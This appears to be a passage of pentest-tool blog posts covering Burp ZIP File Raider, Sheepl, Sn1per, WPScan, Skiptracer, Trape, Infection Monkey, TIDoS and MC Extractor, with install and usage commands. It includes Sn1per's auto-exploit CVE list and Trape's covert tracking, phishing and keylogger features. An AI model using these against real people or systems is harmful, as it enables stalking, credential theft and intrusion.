  3. Request/Response pane - The HTTP request/response will be shown in this pane after clicking on the "Compress & Go" button.

Scanner
This Scanner tab is used for setting the §insertion point§ in the content of the ZIP file before sending it to Burp Scanner.


Descriptions for ZIP File Raider - Scanner tab:
  1. Files and folders pane - list of files and folders in the compressed file which is sent from the previous step (Send request to ...), select a file that you want to set the §insertion points§.
  2. Set insertion point pane - set insertion point in the content of the selected file by clicking on the "Set insertion point" button. (The insertion point will be enclosed with a pair of § symbol)
  3. Config/Status pane - config the scanner and show the scanner status (Not Running/Running).
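The extraction and recompression the extension automates (select an entry, edit it, "Compress & Go") is a small, well-defined transformation, shown here as an added example written for this page; it is not the extension's code. It builds a constructed two-entry archive standing in for an uploaded ZIP body, replaces the content of one entry while preserving every other entry's bytes, timestamp and compression method, and reads the result back. The sample entry names and contents are assumptions:

```python
import io
import zipfile


def build_sample_zip():
    """Constructed upload: a two-entry archive of the kind a client would send in an HTTP body."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.xml", "<manifest><name>report</name></manifest>")
        zf.writestr("data/readme.txt", "hello")
    return buf.getvalue()


def list_entries(zip_bytes):
    """(name, uncompressed size, compression method) for each entry, in archive order."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [(i.filename, i.file_size, i.compress_type) for i in zf.infolist()]


def read_entry(zip_bytes, name):
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(name)


def replace_entry(zip_bytes, name, new_content):
    """Return a new archive identical to the input except that entry `name` now carries `new_content`.
    Reusing each source ZipInfo keeps the other entries' names, timestamps, attributes and compression
    method; sizes and CRCs are recomputed by writestr. Raises KeyError if the entry does not exist."""
    out, found = io.BytesIO(), False
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == name:
                data, found = new_content, True
            dst.writestr(info, data)
    if not found:
        raise KeyError("no entry named %r" % name)
    return out.getvalue()


if __name__ == "__main__":
    original = build_sample_zip()
    edited = replace_entry(original, "manifest.xml", "<manifest><name>edited</name></manifest>")
    print(list_entries(original))
    print(list_entries(edited))
    print(read_entry(edited, "manifest.xml"))
```

The Scanner tab's insertion points amount to calling this replacement once per payload with the marked region of the entry substituted, then sending each rebuilt archive in the original request; on the receiving side the same round trip is a convenient way to build regression fixtures for an upload handler's parser.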

Author
Natsasit Jirathammanuwat


Sheepl - Creating Realistic User Behaviour For Supporting Tradecraft Development Within Lab Environments


Sheepl : Creating realistic user behaviour for supporting tradecraft development within lab environments

Introduction
There are lots of resources available online relating to how you can build AD network environments for the development of blue team and red team tradecraft. However, the current solutions tend to lack one important aspect in representing real-world network configurations: a network is not just a collection of static endpoints, it is a platform for communication between people.
Sheepl is a tool that aims to bridge the gap by emulating the behaviour that people normally undertake within a network environment. Using Python3 and AutoIT3, the output can be compiled into a standalone executable without any other dependencies that, when executed on a Windows endpoint, executes a set of tasks randomly over a chosen time frame.
For red teamers this can serve to present those moments of opportunity to practice tradecraft. For blue teamers this supports focusing on detection of malicious activity indicators inside a sequence of benign user tasks.

Tooling
Sheepl has two modes, commandline and interactive where commandline can be used as part of a wider scripting solution and interactive allows you to build tasks in a question/response approach.

Example
python3 sheepl.py --name TBone --total_time=2h --wordfile "c:\\users\\matt\\Desktop\\matt.doc" --inputtext "content/if.txt" --cmd --cc "ipconfig /all" --cc "whoami" --cc "netstat -anto -p tcp"
python3 sheepl.py --interactive

AutoIT3
You can download the AutoIT3 runtime and the Aut2EXE compiler here: AutoIT3 Download
The following video is an overview of Sheepl 0.1 as the beta release.

YouTube Video


Acknowledgments


Janusec Application Gateway - Tool Which Provides WAF, CC Attack Defense, Unified Web Administration Portal, Private Key Protection, Web Routing And Scalable Load Balancing

Janusec Application Gateway is an application security solution that provides a WAF (Web Application Firewall), a unified web administration portal, private key protection, web routing and scalable load balancing. With Janusec, you can build secure and scalable applications.

Key Features
  • WAF (Web Application Firewall), block SQL Injection, Cross-site Scripting, Sensitive Data Leakage, CC Attacks etc.
  • Group Policy (Cooperation with Multiple Check Points)
  • CAPTCHA support
  • Unified Web Administration
  • HTTPS support, No Agent Required.
  • Certificate Protection with Private Key Encrypted Storage
  • Scalable Architecture, Load Balance and Multiple Nodes Support

Screenshots

SQL Injection Screenshot


Sensitive Data Leakage Screenshot


Official Web Site
https://www.janusec.com/
Detailed documentation is available at Janusec Application Gateway Documentation.

Requirements
  • PostgreSQL 9.3~9.6 or 10 (Required by Development and Master Node of Deployment)
  • CentOS/RHEL 7, Debian 9
  • systemd
  • Golang 1.9+ (Required by Development Only)

Quick Start for Deployment
https://www.janusec.com/documentation/quick-start/

Quick Start for Developer
go get -u github.com/Janusec/janusec
cd $GOPATH/src/github.com/Janusec/janusec
Edit config.json with PostgreSQL
"host": "127.0.0.1",
"port": "5432",
"user": "janusec",
"password": "123456",
"dbname": "janusec"
Janusec will encrypt the password automatically.
Then:
go build
su (switch to root)
./janusec

Web Administration
http://127.0.0.1:9080/ (The first address)
Janusec Application Gateway Configuration

Release
go build
./release.sh (Only support Linux Now)
The release package is under ./dist .

Web Administration Portal
Release directory is ./static/ , and source code is available at Janusec-Admin Github with Angular 5.

Support



Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts


Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.

SN1PER PROFESSIONAL FEATURES:

Professional reporting interface


Slideshow for all gathered screenshots


Searchable and sortable DNS, IP and open port database



Categorized host reports



Quick links to online recon tools and Google hacking queries


Personalized notes field for each host



DEMO VIDEO:
Demo

SN1PER COMMUNITY FEATURES:
  •  Automatically collects basic recon (ie. whois, ping, DNS, etc.)
  •  Automatically launches Google hacking queries against a target domain
  •  Automatically enumerates open ports via NMap port scanning
  •  Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
  •  Automatically checks for sub-domain hijacking
  •  Automatically runs targeted NMap scripts against open ports
  •  Automatically runs targeted Metasploit scan and exploit modules
  •  Automatically scans all web applications for common vulnerabilities
  •  Automatically brute forces ALL open services
  •  Automatically tests for anonymous FTP access
  •  Automatically runs WPScan, Arachni and Nikto for all web services
  •  Automatically enumerates NFS shares
  •  Automatically tests for anonymous LDAP access
  •  Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
  •  Automatically enumerates SNMP community strings, services and users
  •  Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
  •  Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
  •  Automatically tests for open X11 servers
  •  Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
  •  Performs high level enumeration of multiple hosts and subnets
  •  Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
  •  Automatically gathers screenshots of all web sites
  •  Creates individual workspaces to store all scan output

AUTO-PWN:
  • Drupal Drupalgedon2 RCE CVE-2018-7600
  • GPON Router RCE CVE-2018-10561
  • Apache Struts 2 RCE CVE-2017-5638
  • Apache Struts 2 RCE CVE-2017-9805
  • Apache Jakarta RCE CVE-2017-5638
  • Shellshock GNU Bash RCE CVE-2014-6271
  • HeartBleed OpenSSL Detection CVE-2014-0160
  • Default Apache Tomcat Creds CVE-2009-3843
  • MS Windows SMB RCE MS08-067
  • Webmin File Disclosure CVE-2006-3392
  • Anonymous FTP Access
  • PHPMyAdmin Backdoor RCE
  • PHPMyAdmin Auth Bypass
  • JBoss Java De-Serialization RCE's

KALI LINUX INSTALL:
./install.sh

DOCKER INSTALL:
Credits: @menzow
Docker Install: https://github.com/menzow/sn1per-docker
Docker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
Example usage:
$ docker pull menzo/sn1per-docker
$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io

USAGE:
[*] NORMAL MODE
sniper -t|--target <TARGET>

[*] NORMAL MODE + OSINT + RECON
sniper -t|--target <TARGET> -o|--osint -re|--recon

[*] STEALTH MODE + OSINT + RECON
sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon

[*] DISCOVER MODE
sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>

[*] SCAN ONLY SPECIFIC PORT
sniper -t|--target <TARGET> -m port -p|--port <portnum>

[*] FULLPORTONLY SCAN MODE
sniper -t|--target <TARGET> -fp|--fullportonly

[*] PORT SCAN MODE
sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>

[*] WEB MODE - PORT 80 + 443 ONLY!
sniper -t|--target <TARGET> -m|--mode web

[*] HTTP WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>

[*] HTTPS WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>

[*] ENABLE BRUTEFORCE
sniper -t|--target <TARGET> -b|--bruteforce

[*] AIRSTRIKE MODE
sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike

[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>

[*] ENABLE LOOT IMPORTING INTO METASPLOIT
sniper -t|--target <TARGET>

[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport

[*] UPDATE SNIPER
sniper -u|--update

MODES:
  • NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.
  • STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
  • AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
  • NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
  • DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
  • PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
  • FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
  • WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
  • WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.
  • WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.
  • UPDATE: Checks for updates and upgrades all components used by sniper.
  • REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.
  • RELOAD: Reload the master workspace report.

SAMPLE REPORT:
https://gist.github.com/1N3/8214ec2da2c91691bcbc


WPScan v3.4.0 - Black Box WordPress Vulnerability Scanner

WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.

INSTALL

Prerequisites:
  • Ruby >= 2.2.2 - Recommended: 2.3.3
  • Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault
  • RubyGems - Recommended: latest

From RubyGems:
gem install wpscan

From sources:
Prerequisites: Git
git clone https://github.com/wpscanteam/wpscan
cd wpscan/
bundle install && rake install

Docker
Pull the repo with docker pull wpscanteam/wpscan

Usage
wpscan --url blog.tld This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then wpscan --stealthy --url blog.tld can be used. As a result, when using the --enumerate option, don't forget to set the --plugins-detection accordingly, as its default is 'passive'.
For more options, open a terminal and type wpscan --help (if you built wpscan from the source, you should type the command outside of the git repo)
The DB is located at ~/.wpscan/db
WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last):
  • ~/.wpscan/cli_options.json
  • ~/.wpscan/cli_options.yml
  • pwd/.wpscan/cli_options.json
  • pwd/.wpscan/cli_options.yml
If those files exist, their options are loaded in that order; an option found in more than one file is overridden by the later one.
e.g.:
~/.wpscan/cli_options.yml:
  proxy: 'http://127.0.0.1:8080'
  verbose: true
pwd/.wpscan/cli_options.yml:
  proxy: 'socks5://127.0.0.1:9090'
  url: 'http://target.tld'
Running wpscan in the current directory (pwd) is then the same as wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld

PROJECT HOME
https://wpscan.org

VULNERABILITY DATABASE
https://wpvulndb.com


Skiptracer - OSINT Webscraping Framework

Initial attack vectors for recon usually involve utilizing pay-for-data/API (Recon-NG), or paying to utilize transforms (Maltego) to get data mining results. Skiptracer utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget.

Installation
$ git clone https://github.com/xillwillx/skiptracer.git skiptracer
$ cd skiptracer
Install requirements
$ pip install -r requirements.txt
Run
$ python skiptracer.py -l (phone|email|sn|name|plate)

Usage
Full details on how to use Skiptracer are on the wiki located here


Trape v2.0 - People Tracker On The Internet: OSINT Analysis And Research Tool

Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control over their users through the browser, without them knowing, but it evolves with the aim of helping government organizations, companies and researchers to track cybercriminals.

At the beginning of 2018 it was presented at BlackHat Arsenal in Singapore: https://www.blackhat.com/asia-18/arsenal.html#jose-pino and in multiple security events worldwide.

Some benefits
  • LOCATOR OPTIMIZATION: Trace the path between you and the target you're tracking. Each time you make a move, the path will be updated; by means of this the location of the target is obtained silently through a bypass made in the browsers, allowing you not to skip the location request permit on the victim's side (objective or person) and at the same time maintain a precision of 99% in the locator.
  • APPROACH: When you're close to the target, Trape will tell you.
  • REST API: Generates an API (random or custom), and through this you can control and monitor other Web sites on the Internet remotely, getting the traffic of all visitors.
  • PROCESS HOOKS: Manages social engineering attacks or processes in the target's browser.
    --- SEVERAL: You can issue a phishing attack of any domain or service in real time as well as send malicious files to compromise the device of a target.
    --- INJECT JS: You keep the JavaScript code running free in real time, so you can manage the execution of a keylogger or your own custom functions in JS which will be reflected in the target's browser.
    --- SPEECH: A process of audio creation is maintained which is played in the browser of the objective; by means of this you can execute personalized messages in different voices with languages in Spanish and English.
  • PUBLIC NETWORK TUNNEL: Trape has its own API that is linked to ngrok.com to allow the automatic management of public network tunnels; by this you can publish the content of a trape server executed locally to the Internet, to manage hooks or public attacks.
  • CLICK ATTACK TO GET CREDENTIALS: Automatically obtains the target credentials, recognizing your connection availability on a social network or Internet service.
  • NETWORK: You can get information about the user's network.
    --- SPEED: Viewing the target's network speed. (Ping, download, upload, type connection)
    --- HOSTS OR DEVICES: Here you can get a scan of all the devices that are connected in the target network automatically.
  • PROFILE: Brief summary of the target's behavior and important additional information about their device.
    --- GPU
    --- ENERGY
  • SESSION: Session recognition is one of trape's most interesting attractions, since you as a researcher can know remotely what service the target is connected to.
  • USABILITY: You can delete logs and view alerts for each process or action you run against each target.

How to use it
First download the tool.
git clone https://github.com/jofpin/trape.git
cd trape
python trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt
pip install -r requirements.txt
Example of execution
Example: python trape.py --url http://example.com --port 8080
HELP AND OPTIONS
user:~$ python trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
                                  [-ak ACCESSKEY] [-l LOCAL]
                                  [--update] [-n] [-ic INJC]

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -u URL, --url URL     Put the web page url to clone
  -p PORT, --port PORT  Insert your port
  -ak ACCESSKEY, --accesskey ACCESSKEY
                        Insert your custom key access
  -l LOCAL, --local LOCAL
                        Insert your home file
  -n, --ngrok           Insert your ngrok Authtoken
  -ic INJC, --injectcode INJC
                        Insert your custom REST API path
  -ud UPDATE, --update UPDATE
                        Update trape to the latest version

  • --url: In this option you add the URL you use to clone live, which works as a decoy.
  • --port: Here you insert the port where you are going to run the trape server.
  • --accesskey: You enter a custom key for the trape panel; if you do not insert one, an automatic key will be generated.
  • --injectcode: trape contains a REST API to play anywhere; using this option you can customize the name of the file to include. If you do not, it generates a random name allusive to a token.
  • --local: Using this option you can call a local HTML file; this is the replacement of the --url option, made to run a local lure in trape.
  • --ngrok: In this option you can enter a token to run at the time of a process. This would replace the token saved in configurations.
  • --version: You can see the version number of trape.
  • --update: Option especially to upgrade to the latest version of trape.
  • --help: It is used to see all the above options, from the executable.

Disclaimer
This tool has been published for educational purposes in order to teach people how bad guys could track them, monitor them or obtain information from their credentials; we are not responsible for the use or the scope that people may give it through this project.
We are totally convinced that if we teach how vulnerable things are, we can make the Internet a safer place.

Developer
For this development and others, the participants are listed with name, Twitter handle and role.
  • CREATOR
    --- Jose Pino - @jofpin - (Security Researcher)


Infection Monkey v1.6 - An Automated Pentest Tool

The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self-propagate across a data center and reports success to a centralized Monkey Island server.


The Infection Monkey is comprised of two parts:
  • Monkey - A tool which infects other machines and propagates to them
  • Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center
To read more about the Monkey, visit http://infectionmonkey.com

Main Features
The Infection Monkey uses the following techniques and exploits to propagate to other machines.
  • Multiple propagation techniques:
    • Predefined passwords
    • Common logical exploits
    • Password stealing using Mimikatz
  • Multiple exploit methods:
    • SSH
    • SMB
    • RDP
    • WMI
    • Shellshock
    • Conficker
    • SambaCry
    • Elastic Search (CVE-2015-1427)

Setup
Check out the Setup page in the Wiki or a quick getting started guide.

Building the Monkey from source
If you want to build the monkey from source, see Setup and follow the instructions at the readme files under infection_monkey and monkey_island.


TIDoS-Framework v1.7 - The Offensive Manual Web Application Penetration Testing Framework

TIDoS Framework is a comprehensive web-app audit framework. Let's keep this simple.

Highlights :-
The main highlights of this framework are:
  • TIDoS Framework now boasts over a hundred modules.
  • A complete versatile framework to cover up everything from Reconnaissance to Vulnerability Analysis.
  • Has 5 main phases, subdivided into 14 sub-phases consisting of a total of 104 modules.
  • Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules).
  • Scanning & Enumeration Phase has got 15 modules (including port scans, WAF analysis, etc.)
  • Vulnerability Analysis Phase has 36 modules (including most common vulnerabilities in action).
  • Exploits Castle has only 1 exploit. (purely developmental)
  • And finally, Auxiliaries have got 4 modules. Under dev.
  • All four phases each have an Auto-Awesome module which automates every module for you.
  • You just need the domain, and leave everything to this tool.
  • TIDoS has full verbose output support, so you'll know what's going on.
  • Fully user friendly interaction environment. (no shits)


Installation :
  • Clone the repository locally and navigate there:
git clone https://github.com/theinfecteddrake/tidos-framework.git
cd tidos-framework
  • Install the dependencies:
chmod +x install
./install


That's it! Now you are good to go. Let's run the tool:
tidos

Getting Started :-
TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.
But before that, you need to set your own API keys for various OSINT purposes. To do so, open up API_KEYS.py under the files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API keys and access tokens for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own... no harm!
Finally, as the framework opens up, enter the website name, e.g. http://www.example.com, and let TIDoS lead you. That's it! It's as easy as that.
Recommended:
  • Follow the order of the tool (Run in a schematic way).
    Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis
To update this tool, use tidos_updater.py module under tools/ folder.

Flawless Features :-
TIDoS Framework presently supports the following (and is under active development):
  • Reconnaissance + OSINT
    • Passive Reconnaissance:
      • Nping Enumeration via external API
      • WhoIS Lookup Domain info gathering
      • GeoIP Lookup Pinpoint physical location
      • DNS Configuration Lookup DNSDump
      • Subdomains Lookup Indexed ones
      • Reverse DNS Lookup Host Instances
      • Reverse IP Lookup Hosts on same server
      • Subnets Enumeration Class Based
      • Domain IP History IP Instances
      • Web Links Gatherer Indexed ones
      • Google Search Manual search
      • Google Dorking (multiple modules) Automated
      • Email to Domain Resolver Email WhoIs
      • Wayback Machine Lookups Find Backups
      • Breached Email Check Pwned Email Accounts
      • Enumeration via Google Groups Emails Only
      • Check Alias Availability Social Networks
      • Find PasteBin Posts Domain Based
      • LinkedIn Gathering Employees & Company
      • Google Plus Gathering Domain Profiles
      • Public Contact Info Scraping FULL CONTACT
      • Censys Intel Gathering Domain Based
      • Threat Intelligence Gathering Bad IPs
    • Active Reconnaissance
      • Ping Enumeration Advanced
      • CMS Detection (185+ CMSs supported) IMPROVED
      • Advanced Traceroute IMPROVED
      • robots.txt and sitemap.xml Checker
      • Grab HTTP Headers Live Capture
      • Find HTTP Methods Allowed via OPTIONS
      • Detect Server Type IMPROVED
      • Examine SSL Certificate Absolute
      • Apache Status Disclosure Checks File Based
      • WebDAV HTTP Enumeration PROPFIND & SEARCH
      • PHPInfo File Enumeration via Bruteforce
      • Comments Scraper Regex Based
      • Find Shared DNS Hosts Name Server Based
      • Alternate Sites Discovery User-Agent Based
      • Discover Interesting Files via Bruteforce
        • Common Backdoor Locations shells, etc.
        • Common Backup Locations .bak, .db, etc.
        • Common Password Locations .pgp, .skr, etc.
        • Common Proxy Path Configs. .pac, etc.
        • Common Dot Files .htaccess, .apache, etc
    • Information Disclosure
      • Credit Cards Disclosure If Plaintext
      • Email Harvester IMPROVED
      • Fatal Errors Enumeration Includes Full Path Disclosure
      • Internal IP Disclosure Signature Based
      • Phone Number Harvester Signature Based
      • Social Security Number Harvester US Ones
  • Scanning & Enumeration
    • Remote Server WAF Enumeration Generic, 54 WAFs
    • Port Scanning Ingenious Modules
      • Simple Port Scanner via Socket Connections
      • TCP SYN Scan Highly reliable
      • TCP Connect Scan Highly Reliable
      • XMAS Flag Scan Reliable Only in LANs
      • Fin Flag Scan Reliable Only in LANs
      • Port Service Detector
    • Web Technology Enumeration Absolute
    • Operating System Fingerprinting IMPROVED
    • Banner Grabbing of Services via Open Ports
    • Interactive Scanning with NMap 16 preloaded modules
    • Enumeration Domain-Linked IPs Using CENSYS Database
    • Web and Links Crawlers
      • Depth 1 Indexed Uri Crawler
      • Depth 2 Single Page Crawler
      • Depth 3 Web Link Crawler
  • Vulnerability Analysis
    Web-Bugs & Server Misconfigurations
    • Insecure CORS Absolute
    • Same-Site Scripting Sub-domain based
    • Zone Transfer DNS Server based
    • Clickjacking
      • Frame-Busting Checks
      • X-FRAME-OPTIONS Header Checks
    • Security on Cookies
      • HTTPOnly Flag
      • Secure Flag
    • Cloudflare Misconfiguration Check
      • DNS Misconfiguration Checks
      • Online Database Lookup For Breaches
    • HTTP Strict Transport Security Usage
      • HTTPS Enabled but no HSTS
    • Domain Based Email Spoofing
      • Missing SPF Records
      • Missing DMARC Records
    • Host Header Injection
      • Port Based Over HTTP 80
      • X-Forwarded-For Header Injection
    • Security Headers Analysis Live Capture
    • Cross-Site Tracing HTTP TRACE Method
    • Session Fixation via Cookie Injection
    • Network Security Misconfig.
      • Checks for TELNET Enabled via Port 23
    Serious Web Vulnerabilities
    • File Inclusions
      • Local File Inclusion (LFI) Param based
      • Remote File Inclusion (RFI) IMPROVED
        • Parameter Based
        • Pre-loaded Path Based
    • OS Command Injection Linux & Windows (RCE)
    • Path Traversal (Sensitive Paths)
    • Cross-Site Request Forgery Absolute
    • SQL Injection
      • Error Based Injection
        • Cookie Value Based
        • Referer Value Based
        • User-Agent Value Based
        • Auto-gathering IMPROVED
      • Blind Based Injection Crafted Payloads
        • Cookie Value Based
        • Referer Value Based
        • User-Agent Value Based
        • Auto-gathering IMPROVED
    • LDAP Injection Parameter Based
    • HTML Injection Parameter Based
    • Bash Command Injection ShellShock
    • XPATH Injection Parameter Based
    • Cross-Site Scripting IMPROVED
      • Cookie Value Based
      • Referer Value Based
      • User-Agent Value Based
      • Parameter Value Based Manual
    • Unvalidated URL Forwards Open Redirect
    • PHP Code Injection Windows + Linux
    • HTTP Response Splitting CRLF Injection
      • User-Agent Value Based
      • Parameter value Based Manual
    • Sub-domain Takeover 50+ Services
      • Single Sub-domain Manual
      • All Subdomains Automated
    Other
    • PlainText Protocol Default Credential Bruteforce
      • FTP Protocol Bruteforce
      • SSH Protocol Bruteforce
      • POP 2/3 Protocol Bruteforce
      • SQL Protocol Bruteforce
      • XMPP Protocol Bruteforce
      • SMTP Protocol Bruteforce
      • TELNET Protocol Bruteforce
  • Auxiliary Modules
    • Hash Generator MD5, SHA1, SHA256, SHA512
    • String & Payload Encoder 7 Categories
    • Forensic Image Analysis Metadata Extraction
    • Web HoneyPot Probability ShodanLabs HoneyScore
  • Exploitation purely developmental
    • ShellShock

Other Tools:
  • net_info.py - Displays information about your network. Located under tools/.
  • tidos_updater.py - Updates the framework to the latest release via signature matching. Located under tools/.

TIDoS In Action:

Version:
v1.7 [latest release] [#stable]

Upcoming:
These are some modules which I have thought of adding:
  • Some more Enumeration & Information Disclosure modules.
  • Lots more OSINT & stuff (let that be a suspense).
  • More Auxiliary Modules.
  • Some exploits are also being worked on.

Ongoing:
  • Working on a full-featured Web UI implementation on Flask and MongoDB and Node.js.
  • Working on a new framework, a real framework. To be released with v2
  • Working on a campaign feature + addition of arguments.
  • Normal bug fixing, as per the issues being raised.
  • Some other perks:
    • Working on a way for contributing new modules easily.
    • A complete new method of multi-threaded fuzzing of parameters.
    • Keeping better of new console stuff.


MCExtractor - Intel, AMD, VIA & Freescale Microcode Extraction Tool

Intel, AMD, VIA & Freescale Microcode Extraction Tool
MC Extractor News Feed
MC Extractor Discussion Topic
Intel, AMD & VIA CPU Microcode Repositories

A. About MC Extractor
MC Extractor is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc. It is capable of converting Intel microcode containers (dat, inc, h, txt) to binary images for BIOS integration, detecting new/unknown microcodes, checking microcode health, Updated/Outdated status and more. MC Extractor can also be used as a research analysis tool with multiple structures which allow, among others, full parsing & information display of all microcode Headers, documented or not. Moreover, with the help of its extensive database, MC Extractor is capable of uniquely categorizing all supported microcodes as well as checking for any microcodes which have not been stored at the Microcode Repositories yet.

A1. MC Extractor Features
  • Supports all current & legacy Microcodes from 1995 and onward
  • Scans for all Intel, AMD, VIA & Freescale microcodes in one run
  • Verifies all extracted microcode integrity via Checksums
  • Checks if all Intel, AMD & VIA microcodes are Latest or Outdated
  • Converts Intel containers (dat,inc,txt,h) to binary images
  • Searches on demand for all microcodes based on CPUID
  • Shows microcode Header structures and details on demand
  • Ignores most false positives based on sanity checks
  • Supports known special, fixed or modded microcodes
  • Ability to quickly add new microcode entries to the database
  • Ability to detect Intel Production/Pre-Production Release tag
  • Ability to analyze multiple files by drag & drop or by input path
  • Ability to ignore extracted duplicates based on name and contents
  • Reports all microcodes which are not found at the Microcode Repositories
  • Features command line parameters to enhance functionality & assist research
  • Features user friendly messages & proper handling of unexpected code errors
  • Shows results in nice tables with colored text to signify emphasis
  • Open Source project licensed under GNU GPL v3, comment assisted code

A2. Microcode Repository Database
MC Extractor allows end-users and/or researchers to quickly extract, view, convert & report new microcode versions without the use of special tools or Hex Editors. To do that effectively, a database had to be built. The Intel, AMD & VIA CPU Microcode Repositories is a collection of every Intel, AMD & VIA CPU Microcodes we have found. Its existence is very important for MC Extractor as it allows us to continue doing research, find new types of microcode, compare releases for similarities, check for updated binaries etc. Bundled with MC Extractor is a file called MCE.db which is required for the program to run. It includes entries for all Microcode binaries that are available to us. This accommodates primarily two actions: a) Check whether the imported microcode is up to date and b) Help find new Microcode releases sooner by reporting them at the Intel, AMD & VIA CPU Microcode Repositories Discussion thread.

A3. Sources and Inspiration
MC Extractor was initially based on a fraction of Lordkag's UEFIStrip tool so, first and foremost, I thank him for all his work which inspired this project. Among others, great places to learn about microcodes are Intel's own download site and official documentation, Intel Microcode Patch Authentication, Coreboot (a,b,c), Microparse by Dominic Chen, Ben Hawkes's Notes and Research, Richard A Burton's Microdecode, AIDA64 CPUID dumps, Sandpile CPUID, Free Electrons (a, b), Freescale and many more which I may have forgotten but would have been here otherwise.

B. How to use MC Extractor
There are two ways to use MC Extractor: the MCE executable and the Command Prompt. The MCE executable allows you to drag & drop one or more firmware files and view them one by one, or recursively scan entire directories. To manually call MC Extractor, a Command Prompt can be used with -skip as parameter.

B1. MC Extractor Executable
To use MC Extractor, select one or multiple files and Drag & Drop them to its executable. You can also input certain optional parameters either by running MCE directly or by first dropping one or more files to it. Keep in mind that, due to operating system limitations, there is a limit on how many files can be dropped at once. If the latter is a problem, you can always use the -mass parameter to recursively scan entire directories as explained below.

B2. MC Extractor Parameters
There are various parameters which enhance or modify the default behavior of MC Extractor:
  • -? : Displays help & usage screen
  • -skip : Skips welcome & options screen
  • -exit : Skips the "Press enter to exit" prompt
  • -redir : Enables console redirection support
  • -mass : Scans all files of a given directory
  • -info : Displays microcode header(s)
  • -add : Adds new input microcode to DB
  • -dbname : Renames input file based on DB name
  • -cont : Extracts Intel containers (dat,inc,h,txt)
  • -search : Searches for microcodes based on CPUID
  • -last : Shows Latest status based on user input
  • -repo : Builds microcode repositories from input
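As an added illustration of what the -cont conversion, the -info header display and the checksum verification involve (example code written for this page, not MC Extractor's own code or its internal structures), the Python below converts a text container of hex DWORDs to a binary image, decodes the 48-byte Intel microcode header and checks the sum-to-zero DWORD checksum from the Intel SDM's "Microcode Update Format" description. The microcode image it builds is constructed for the demo, not a real Intel release.

```python
"""Intel microcode container conversion, header parsing and checksum check.

Added example, not MC Extractor's code. Field layout follows the Intel SDM
(Vol. 3A, Microcode Update Format); the sample update is constructed.
"""
import re
import struct
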